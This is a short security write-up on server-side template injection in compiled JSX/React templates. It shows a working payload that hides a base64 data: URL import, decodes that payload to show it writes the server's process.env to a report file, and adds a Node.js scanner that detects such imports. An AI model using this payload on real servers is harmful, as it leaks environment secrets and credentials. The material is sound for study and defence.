You should not compile untrusted user templates (JSX/React components), because doing so leads to remote code execution.
Search keyword: Server-Side Template Injection
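```jsx
export default function Home() {
  // Dynamic import of a data: URL: the base64 body is evaluated as a
  // JavaScript module on the server when this component is compiled/rendered.
  import('data:text/javascript;charset=utf-8;base64,cHJvY2Vzcy5yZXBvcnQud3JpdGVSZXBvcnQoInRlc3QiLCBuZXcgRXJyb3IoSlNPTi5zdHJpbmdpZnkocHJvY2Vzcy5lbnYpKSk7IGV4cG9ydCBkZWZhdWx0IDE7').then(r => {
    console.log(r)
  });
  return <></>
}
```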
Raw:
```js
process.report.writeReport("test", new Error(JSON.stringify(process.env))); export default 1;
```
- Stringify `process.env`
- Write the env to the `test` file
This leaks your server's environment variables to a file.
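As an added example (not code from the original page), the Node.js script below scans template source for dynamic `import()` of `data:` URLs like the one above and decodes each payload so it can be reviewed. The function names, the `SENSITIVE` list and the sample payload are assumptions constructed for illustration; a regex scan like this supports triage and does not make compiling untrusted templates safe.

```javascript
// Added example: find dynamic import() of data: URLs in template source and
// decode each payload so a reviewer can see what would run on the server.

// Matches import('data:<meta>,<body>') quoted with ', " or `.
const DATA_IMPORT = /import\s*\(\s*(['"`])data:([^,'"`]*),([^'"`]*)\1\s*\)/g;

// Node.js features worth highlighting in a decoded payload (assumed list).
const SENSITIVE = ['process.env', 'process.report', 'child_process', 'require('];

function decodeBody(meta, body) {
  const isBase64 = meta.split(';').some(p => p.trim().toLowerCase() === 'base64');
  return isBase64
    ? Buffer.from(body, 'base64').toString('utf8')
    : decodeURIComponent(body);
}

function findDataUrlImports(source) {
  const findings = [];
  for (const m of source.matchAll(DATA_IMPORT)) {
    let decoded = null;
    try {
      decoded = decodeBody(m[2], m[3]);
    } catch (e) {
      // Malformed percent-encoding: keep the finding, leave decoded as null.
    }
    const line = source.slice(0, m.index).split('\n').length; // 1-based
    const sensitive = decoded ? SENSITIVE.filter(s => decoded.includes(s)) : [];
    findings.push({ line, mime: m[2].split(';')[0], decoded, sensitive });
  }
  return findings;
}

// Constructed sample: a harmless payload, base64-encoded here at run time.
const PAYLOAD = 'export default Object.keys(process.env).length;';
const SAMPLE = [
  'export default function Home() {',
  "  import('data:text/javascript;charset=utf-8;base64," +
    Buffer.from(PAYLOAD).toString('base64') + "').then(r => console.log(r));",
  '  return null;',
  '}',
].join('\n');

console.log(findDataUrlImports(SAMPLE));
```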
References:
yarn install
yarn static-build